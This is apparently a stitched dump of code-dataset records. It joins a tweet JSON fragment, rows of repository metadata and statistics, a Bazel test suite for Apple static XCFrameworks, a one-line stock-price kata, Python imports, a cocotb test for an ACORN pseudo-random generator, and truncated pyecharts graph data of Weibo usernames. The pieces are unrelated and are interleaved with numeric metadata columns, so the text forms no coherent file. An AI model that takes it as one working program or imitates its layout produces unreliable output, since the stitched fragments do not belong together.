"following": False,
"follow_request_sent": False,
"notifications": False,
"translator_type": "none"
},
"geo": None,
"coordinates": None,
"place": None,
"contributors": None,
"is_quote_status": False,
"retweet_count": 80,
"favorite_count": 47,
"favorited": False,
"retweeted": False,
"possibly_sensitive": False,
"lang": "en"
},
"retweet_count": 190,
"favorite_count": 118,
"favorited": False,
"retweeted": False,
"possibly_sensitive": False,
"lang": "en"
},
"is_quote_status": True,
"quoted_status_id": 878622618886094800,
"quoted_status_id_str": "878622618886094848",
"retweet_count": 190,
"favorite_count": 0,
"favorited": False,
"retweeted": False,
"lang": "en"
}
| 34.361512
| 183
| 0.532303
| 4,955
| 49,996
| 5.120686
| 0.115237
| 0.022071
| 0.021282
| 0.016395
| 0.822252
| 0.801837
| 0.779805
| 0.770386
| 0.757143
| 0.738344
| 0
| 0.101018
| 0.318485
| 49,996
| 1,455
| 184
| 34.361512
| 0.642767
| 0.00558
| 0
| 0.723227
| 0
| 0.011127
| 0.50351
| 0.094148
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f89addb90d78b43c7b37576af583919f835e82e4
| 15,056
|
bzl
|
Python
|
test/starlark_tests/apple_static_xcframework_tests.bzl
|
wendyliga/rules_apple
|
ac43c1e467564d9df6b3355ff93fcaf224f2c0f9
|
[
"Apache-2.0"
] | null | null | null |
test/starlark_tests/apple_static_xcframework_tests.bzl
|
wendyliga/rules_apple
|
ac43c1e467564d9df6b3355ff93fcaf224f2c0f9
|
[
"Apache-2.0"
] | null | null | null |
test/starlark_tests/apple_static_xcframework_tests.bzl
|
wendyliga/rules_apple
|
ac43c1e467564d9df6b3355ff93fcaf224f2c0f9
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""xcframework Starlark tests."""
load(
":rules/common_verification_tests.bzl",
"archive_contents_test",
)
def apple_static_xcframework_test_suite(name):
"""Test suite for apple_static_xcframework.
Args:
name: the base name to be used in things created by this macro
"""
archive_contents_test(
name = "{}_ios_root_plist_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework",
plist_test_file = "$BUNDLE_ROOT/Info.plist",
plist_test_values = {
"AvailableLibraries:0:LibraryIdentifier": "ios-arm64",
"AvailableLibraries:0:LibraryPath": "ios_static_xcframework.framework",
"AvailableLibraries:0:SupportedArchitectures:0": "arm64",
"AvailableLibraries:0:SupportedPlatform": "ios",
"AvailableLibraries:1:LibraryIdentifier": "ios-arm64_x86_64-simulator",
"AvailableLibraries:1:LibraryPath": "ios_static_xcframework.framework",
"AvailableLibraries:1:SupportedArchitectures:0": "arm64",
"AvailableLibraries:1:SupportedArchitectures:1": "x86_64",
"AvailableLibraries:1:SupportedPlatform": "ios",
"CFBundlePackageType": "XFWK",
"XCFrameworkFormatVersion": "1.0",
},
tags = [name],
)
archive_contents_test(
name = "{}_ios_arm64_archive_contents_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework",
contains = [
"$BUNDLE_ROOT/ios-arm64/ios_static_xcframework.framework/Headers/shared.h",
"$BUNDLE_ROOT/ios-arm64/ios_static_xcframework.framework/Headers/ios_static_xcframework.h",
"$BUNDLE_ROOT/ios-arm64/ios_static_xcframework.framework/Modules/module.modulemap",
"$BUNDLE_ROOT/ios-arm64/ios_static_xcframework.framework/ios_static_xcframework",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcframework.framework/Headers/shared.h",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcframework.framework/Headers/ios_static_xcframework.h",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcframework.framework/Modules/module.modulemap",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcframework.framework/ios_static_xcframework",
"$BUNDLE_ROOT/Info.plist",
],
tags = [name],
)
archive_contents_test(
name = "{}_ios_avoid_deps_test".format(name),
build_type = "device",
compilation_mode = "opt",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcfmwk_with_avoid_deps",
contains = [
"$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_avoid_deps.framework/ios_static_xcfmwk_with_avoid_deps",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_avoid_deps.framework/ios_static_xcfmwk_with_avoid_deps",
"$BUNDLE_ROOT/Info.plist",
],
not_contains = [
"$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_avoid_deps.frameworks/Headers/DummyFmwk.h",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_avoid_deps.frameworks/Headers/DummyFmwk.h",
],
binary_test_file = "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_avoid_deps.framework/ios_static_xcfmwk_with_avoid_deps",
binary_test_architecture = "x86_64",
binary_contains_symbols = ["_doStuff"],
binary_not_contains_symbols = ["_frameworkDependent"],
tags = [name],
)
archive_contents_test(
name = "{}_objc_generated_modulemap_file_content_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcfmwk_with_objc_sdk_dylibs_and_and_sdk_frameworks",
text_test_file = "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_objc_sdk_dylibs_and_and_sdk_frameworks.framework/Modules/module.modulemap",
text_test_values = [
"framework module ios_static_xcfmwk_with_objc_sdk_dylibs_and_and_sdk_frameworks",
"umbrella header \"ios_static_xcfmwk_with_objc_sdk_dylibs_and_and_sdk_frameworks.h\"",
"link \"c++\"",
"link \"sqlite3\"",
],
tags = [name],
)
archive_contents_test(
name = "{}_swift_ios_arm64_x86_64_archive_contents_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcfmwk_with_swift",
contains = [
"$BUNDLE_ROOT/Info.plist",
"$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift.framework/Modules/ios_static_xcfmwk_with_swift.swiftmodule/arm64.swiftdoc",
"$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift.framework/Modules/ios_static_xcfmwk_with_swift.swiftmodule/arm64.swiftinterface",
"$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift.framework/ios_static_xcfmwk_with_swift",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift.framework/Modules/ios_static_xcfmwk_with_swift.swiftmodule/arm64.swiftdoc",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift.framework/Modules/ios_static_xcfmwk_with_swift.swiftmodule/arm64.swiftinterface",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift.framework/Modules/ios_static_xcfmwk_with_swift.swiftmodule/x86_64.swiftdoc",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift.framework/Modules/ios_static_xcfmwk_with_swift.swiftmodule/x86_64.swiftinterface",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift.framework/ios_static_xcfmwk_with_swift",
],
tags = [name],
)
# Test that the Swift generated header is propagated to the Headers directory visible within
# this iOS statix XCFramework along with the Swift interfaces and modulemap files.
archive_contents_test(
name = "{}_swift_generates_header_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcfmwk_with_swift_generated_headers",
contains = [
"$BUNDLE_ROOT/Info.plist",
"$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift_generated_headers.framework/Headers/ios_static_xcfmwk_with_swift_generated_headers.h",
"$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/module.modulemap",
"$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/ios_static_xcfmwk_with_swift_generated_headers.swiftmodule/arm64.swiftdoc",
"$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/ios_static_xcfmwk_with_swift_generated_headers.swiftmodule/arm64.swiftinterface",
"$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift_generated_headers.framework/ios_static_xcfmwk_with_swift_generated_headers",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift_generated_headers.framework/Headers/ios_static_xcfmwk_with_swift_generated_headers.h",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/module.modulemap",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/ios_static_xcfmwk_with_swift_generated_headers.swiftmodule/arm64.swiftdoc",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/ios_static_xcfmwk_with_swift_generated_headers.swiftmodule/arm64.swiftinterface",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/ios_static_xcfmwk_with_swift_generated_headers.swiftmodule/x86_64.swiftdoc",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/ios_static_xcfmwk_with_swift_generated_headers.swiftmodule/x86_64.swiftinterface",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift_generated_headers.framework/ios_static_xcfmwk_with_swift_generated_headers",
],
tags = [name],
)
# Tests below verify device/simulator builds for static libraries using Mach-O load commands.
# Logic behind which load command gets written, and platform information can be found on LLVM's:
# - llvm/include/llvm/BinaryFormat/MachO.h
# - llvm/llvm-project/llvm/lib/MC/MCStreamer.cpp
# Verify device/simulator static libraries with Mach-O load commands:
# - LC_VERSION_MIN_IOS: Present if target minimum version is below 12.0 and is not arm64 sim.
# - LC_BUILD_VERSION: Present if target minimum version is above 12.0 or is arm64 sim.
archive_contents_test(
name = "{}_ios_arm64_macho_load_cmd_for_simulator".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework",
binary_test_architecture = "arm64",
binary_test_file = "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcframework.framework/ios_static_xcframework",
macho_load_commands_not_contain = ["cmd LC_VERSION_MIN_IPHONEOS"],
tags = [name],
)
archive_contents_test(
name = "{}_ios_x86_64_below_12_0_macho_load_cmd_for_simulator".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework",
binary_test_architecture = "x86_64",
binary_test_file = "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcframework.framework/ios_static_xcframework",
macho_load_commands_contain = ["cmd LC_VERSION_MIN_IPHONEOS"],
macho_load_commands_not_contain = ["cmd LC_BUILD_VERSION"],
tags = [name],
)
archive_contents_test(
name = "{}_ios_x86_64_above_12_0_macho_load_cmd_for_simulator".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework_min_os_12",
binary_test_architecture = "x86_64",
binary_test_file = "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcframework_min_os_12.framework/ios_static_xcframework_min_os_12",
macho_load_commands_contain = ["cmd LC_BUILD_VERSION", "platform 7"],
macho_load_commands_not_contain = ["cmd LC_VERSION_MIN_IPHONEOS"],
tags = [name],
)
# Verifies device static libraries build with Mach-O load commands.
# - LC_VERSION_MIN_IOS: Present if target minimum version is below 12.0.
# - LC_BUILD_VERSION: Present if target minimum version is above 12.0.
archive_contents_test(
name = "{}_ios_x86_64_arm64_below_12_0_macho_load_cmd_for_device".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework",
binary_test_file = "$BUNDLE_ROOT/ios-arm64/ios_static_xcframework.framework/ios_static_xcframework",
macho_load_commands_contain = ["cmd LC_VERSION_MIN_IPHONEOS"],
macho_load_commands_not_contain = ["cmd LC_BUILD_VERSION"],
tags = [name],
)
archive_contents_test(
name = "{}_ios_x86_64_arm64_above_12_0_macho_load_cmd_for_device".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework_min_os_12",
binary_test_file = "$BUNDLE_ROOT/ios-arm64/ios_static_xcframework_min_os_12.framework/ios_static_xcframework_min_os_12",
macho_load_commands_contain = ["cmd LC_BUILD_VERSION", "platform 2"],
macho_load_commands_not_contain = ["cmd LC_VERSION_MIN_IPHONEOS"],
tags = [name],
)
# Verifies that the include scanning feature builds for the given XCFramework rule.
archive_contents_test(
name = "{}_ios_arm64_cc_include_scanning_test".format(name),
build_type = "device",
target_features = ["cc_include_scanning"],
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework",
contains = [
"$BUNDLE_ROOT/ios-arm64/ios_static_xcframework.framework/ios_static_xcframework",
],
tags = [name],
)
# Verifies that bundle_name changes the embedded static libraries and the modulemap file as well
# as the name of the bundle for the xcframeworks.
archive_contents_test(
name = "{}_ios_bundle_name_contents_swift_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcfmwk_with_swift_and_bundle_name",
contains = [
"$ARCHIVE_ROOT/ios_static_xcfmwk_with_custom_bundle_name.xcframework/",
"$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_custom_bundle_name.framework/ios_static_xcfmwk_with_custom_bundle_name",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_custom_bundle_name.framework/ios_static_xcfmwk_with_custom_bundle_name",
],
text_test_file = "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_custom_bundle_name.framework/Modules/module.modulemap",
text_test_values = [
"framework module ios_static_xcfmwk_with_custom_bundle_name",
"header \"ios_static_xcfmwk_with_custom_bundle_name.h\"",
"requires objc",
],
tags = [name],
)
archive_contents_test(
name = "{}_custom_umbrella_header_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework_umbrella_header",
text_test_file = "$BUNDLE_ROOT/ios-arm64/ios_static_xcframework_umbrella_header.framework/Modules/module.modulemap",
text_test_values = [
"framework module ios_static_xcframework_umbrella_header",
"umbrella header \"Umbrella.h\"",
],
tags = [name],
)
native.test_suite(
name = name,
tags = [name],
)
| 59.746032
| 200
| 0.739772
| 1,910
| 15,056
| 5.367016
| 0.113089
| 0.086918
| 0.090723
| 0.114916
| 0.793484
| 0.775632
| 0.741781
| 0.719832
| 0.715833
| 0.706955
| 0
| 0.027094
| 0.168969
| 15,056
| 251
| 201
| 59.984064
| 0.792199
| 0.123273
| 0
| 0.435644
| 0
| 0.039604
| 0.631379
| 0.59708
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004951
| false
| 0
| 0
| 0
| 0.004951
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6efd892bde04360eb80a8651ffa8cb9427653f08
| 112
|
py
|
Python
|
katas/beta/to_buy_or_not_to_buy.py
|
the-zebulan/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 40
|
2016-03-09T12:26:20.000Z
|
2022-03-23T08:44:51.000Z
|
katas/beta/to_buy_or_not_to_buy.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | null | null | null |
katas/beta/to_buy_or_not_to_buy.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 36
|
2016-11-07T19:59:58.000Z
|
2022-03-31T11:18:27.000Z
|
def buy_or_pass(stock_price, all_time_high):
return 'Buy' if stock_price <= all_time_high * 0.8 else 'Pass'
| 37.333333
| 66
| 0.741071
| 21
| 112
| 3.571429
| 0.666667
| 0.266667
| 0.346667
| 0.453333
| 0.56
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021053
| 0.151786
| 112
| 2
| 67
| 56
| 0.768421
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 1
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
|
0
| 8
|
3e16007db28cbba7c07bfbc4ef71dc850961e644
| 235
|
py
|
Python
|
django_shares/db/models/__init__.py
|
InfoAgeTech/django-shares
|
1b301852fa261a7eb6c872dc912517368da6cb33
|
[
"MIT"
] | null | null | null |
django_shares/db/models/__init__.py
|
InfoAgeTech/django-shares
|
1b301852fa261a7eb6c872dc912517368da6cb33
|
[
"MIT"
] | null | null | null |
django_shares/db/models/__init__.py
|
InfoAgeTech/django-shares
|
1b301852fa261a7eb6c872dc912517368da6cb33
|
[
"MIT"
] | null | null | null |
from .managers import ShareManager
from .managers import SharedObjectManager
from .mixins import AbstractSafeDeleteSharedObjectModelMixin
from .mixins import AbstractSharedObjectModelMixin
from .mixins import SafeDeleteShareModelMixin
| 39.166667
| 60
| 0.893617
| 20
| 235
| 10.5
| 0.45
| 0.142857
| 0.228571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 235
| 5
| 61
| 47
| 0.976744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3e1e3e6bf5cdbeaa2667aff50334ffbbc39ea6ce
| 39
|
py
|
Python
|
fix_dict/__init__.py
|
Senmumu/fixdict
|
2fecfc9b330449e8bd9190029f00ab535be1403e
|
[
"MIT"
] | 1
|
2018-02-27T09:48:27.000Z
|
2018-02-27T09:48:27.000Z
|
fix_dict/__init__.py
|
Senmumu/fixdict
|
2fecfc9b330449e8bd9190029f00ab535be1403e
|
[
"MIT"
] | null | null | null |
fix_dict/__init__.py
|
Senmumu/fixdict
|
2fecfc9b330449e8bd9190029f00ab535be1403e
|
[
"MIT"
] | null | null | null |
from fix_dict.fix_dict import fix_dict
| 19.5
| 38
| 0.871795
| 8
| 39
| 3.875
| 0.5
| 0.677419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 39
| 1
| 39
| 39
| 0.885714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3e382bde8a9717dce85a642d38f8f58edccd031a
| 50
|
py
|
Python
|
MORSE/lab_world/src/lab_world/builder/robots/__init__.py
|
offroad-robotics/Robot-Simulator-Comparison
|
941b05be679a90f404ba6bb507f09d5289de79aa
|
[
"MIT"
] | null | null | null |
MORSE/lab_world/src/lab_world/builder/robots/__init__.py
|
offroad-robotics/Robot-Simulator-Comparison
|
941b05be679a90f404ba6bb507f09d5289de79aa
|
[
"MIT"
] | null | null | null |
MORSE/lab_world/src/lab_world/builder/robots/__init__.py
|
offroad-robotics/Robot-Simulator-Comparison
|
941b05be679a90f404ba6bb507f09d5289de79aa
|
[
"MIT"
] | null | null | null |
from .husky import Husky
from .husky import Husky
| 16.666667
| 24
| 0.8
| 8
| 50
| 5
| 0.375
| 0.45
| 0.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 50
| 2
| 25
| 25
| 0.952381
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
e49d4e597e9405bbb83dd82832db5867f486dded
| 154
|
py
|
Python
|
src/caracal/declaration/__init__.py
|
caracalai/caracal
|
c93373fb88091175c32dc0e4a91eb7a78b693367
|
[
"MIT"
] | 25
|
2021-12-10T14:07:04.000Z
|
2022-02-21T14:45:31.000Z
|
src/caracal/declaration/__init__.py
|
caracalai/caracal
|
c93373fb88091175c32dc0e4a91eb7a78b693367
|
[
"MIT"
] | null | null | null |
src/caracal/declaration/__init__.py
|
caracalai/caracal
|
c93373fb88091175c32dc0e4a91eb7a78b693367
|
[
"MIT"
] | null | null | null |
from caracal.declaration.nodetype import MetaInfo
import caracal.declaration.datatypes as cara_types
from caracal.declaration.projects import ProjectInfo
| 38.5
| 52
| 0.883117
| 19
| 154
| 7.105263
| 0.631579
| 0.4
| 0.325926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077922
| 154
| 3
| 53
| 51.333333
| 0.950704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e4bcfdbf1ab7f54676d2f097b1d50b4aaeac13be
| 2,059
|
py
|
Python
|
acorn_prng/test/test_acorn_prng.py
|
ZhenleC/acorn_prng
|
5f7d3e5d0fcc9ffc3845dd7e97f55219ebd112ec
|
[
"Apache-2.0"
] | 1
|
2022-03-22T13:39:51.000Z
|
2022-03-22T13:39:51.000Z
|
acorn_prng/test/test_acorn_prng.py
|
ZhenleC/acorn_prng
|
5f7d3e5d0fcc9ffc3845dd7e97f55219ebd112ec
|
[
"Apache-2.0"
] | null | null | null |
acorn_prng/test/test_acorn_prng.py
|
ZhenleC/acorn_prng
|
5f7d3e5d0fcc9ffc3845dd7e97f55219ebd112ec
|
[
"Apache-2.0"
] | 1
|
2022-03-21T10:56:21.000Z
|
2022-03-21T10:56:21.000Z
|
import cocotb
from cocotb.triggers import Timer
@cocotb.test()
async def test_acorn_prng(dut):
"""Try accessing the design."""
for cycle in range(1):
dut.reset.value = 1
dut.clk.value = 0
await Timer(1, units="ns")
dut.clk.value = 1
await Timer(1, units="ns")
for cycle in range(1):
dut.load.value = 1
dut.reset.value = 0
dut.select.value = 0
dut.clk.value = 0
await Timer(1, units="ns")
dut.clk.value = 1
await Timer(1, units="ns")
assert dut.seed.value == 2049, "Loaded0"
for cycle in range(100):
dut.load.value = 0
dut.reset.value = 0
dut.clk.value = 0
await Timer(1, units="ns")
dut.clk.value = 1
await Timer(1, units="ns")
dut._log.info("Output is %s", dut.out.value)
if (cycle == 20):
assert dut.out.value == 2049, "correct_10"
if (cycle == 35):
assert dut.out.value == 16, "correct_11"
for cycle in range(1):
dut.reset.value = 1
dut.clk.value = 0
await Timer(1, units="ns")
dut.clk.value = 1
await Timer(1, units="ns")
for cycle in range(1):
dut.load.value = 1
dut.reset.value = 0
dut.select.value = 3
dut.clk.value = 0
await Timer(1, units="ns")
dut.clk.value = 1
await Timer(1, units="ns")
assert dut.seed.value == 4095, "Loaded3"
for cycle in range(100):
dut.load.value = 0
dut.reset.value = 0
dut.clk.value = 0
await Timer(1, units="ns")
dut.clk.value = 1
await Timer(1, units="ns")
dut._log.info("Output is %s", dut.out.value)
if (cycle == 20):
assert dut.out.value == 4095, "correct_10"
if (cycle == 35):
assert dut.out.value == 4080, "correct_11"
| 23.94186
| 63
| 0.486644
| 275
| 2,059
| 3.614545
| 0.185455
| 0.078471
| 0.132797
| 0.193159
| 0.848089
| 0.848089
| 0.848089
| 0.848089
| 0.848089
| 0.777666
| 0
| 0.0682
| 0.387567
| 2,059
| 85
| 64
| 24.223529
| 0.720063
| 0
| 0
| 0.793103
| 0
| 0
| 0.050296
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 1
| 0
| false
| 0
| 0.034483
| 0
| 0.034483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e4e7ab1322142ef009024ade0a55e025765ad91c
| 45
|
py
|
Python
|
yabbi/blueprints/page/__init__.py
|
HealthHackAu2018/yabbi
|
84a267bae0329cbf68699c6f28f6708ecf78ff3d
|
[
"MIT"
] | 4
|
2018-09-15T00:59:44.000Z
|
2019-08-21T22:15:30.000Z
|
yabbi/blueprints/page/__init__.py
|
HealthHackAu2018/yabbi
|
84a267bae0329cbf68699c6f28f6708ecf78ff3d
|
[
"MIT"
] | null | null | null |
yabbi/blueprints/page/__init__.py
|
HealthHackAu2018/yabbi
|
84a267bae0329cbf68699c6f28f6708ecf78ff3d
|
[
"MIT"
] | 1
|
2018-09-15T06:45:21.000Z
|
2018-09-15T06:45:21.000Z
|
from yabbi.blueprints.page.views import page
| 22.5
| 44
| 0.844444
| 7
| 45
| 5.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 45
| 1
| 45
| 45
| 0.926829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
39e862cf17ff9e54ded776f15f8a755fc9f03df5
| 397,939
|
py
|
Python
|
app/charts/graph.py
|
chenxinjingjing/pyecharts-app
|
76ee6684b1b4ee416928adb29764b6316ad3bb39
|
[
"MIT"
] | 188
|
2017-12-21T15:27:28.000Z
|
2022-01-14T10:46:34.000Z
|
app/charts/graph.py
|
QuincyC379/pyecharts-app
|
316b370622c316e49a556aab71409d79e26c0a86
|
[
"MIT"
] | 5
|
2018-10-29T06:12:29.000Z
|
2019-12-30T07:08:09.000Z
|
app/charts/graph.py
|
QuincyC379/pyecharts-app
|
316b370622c316e49a556aab71409d79e26c0a86
|
[
"MIT"
] | 90
|
2017-12-22T07:21:15.000Z
|
2022-03-03T07:35:24.000Z
|
from pyecharts import Graph, Page, Style
WEIBO = [
[
{
"name": "",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "Camel3942",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "Camel3942",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "Christinez",
"symbolSize": 13,
"draggable": "False",
"value": 7,
"category": "Christinez",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "JoannaBlue",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "JoannaBlue",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "Michael-Cheung-",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "Michael-Cheung-",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "NKmilitaryStudies",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "NKmilitaryStudies",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "Syfannn",
"symbolSize": 5,
"draggable": "False",
"value": 1,
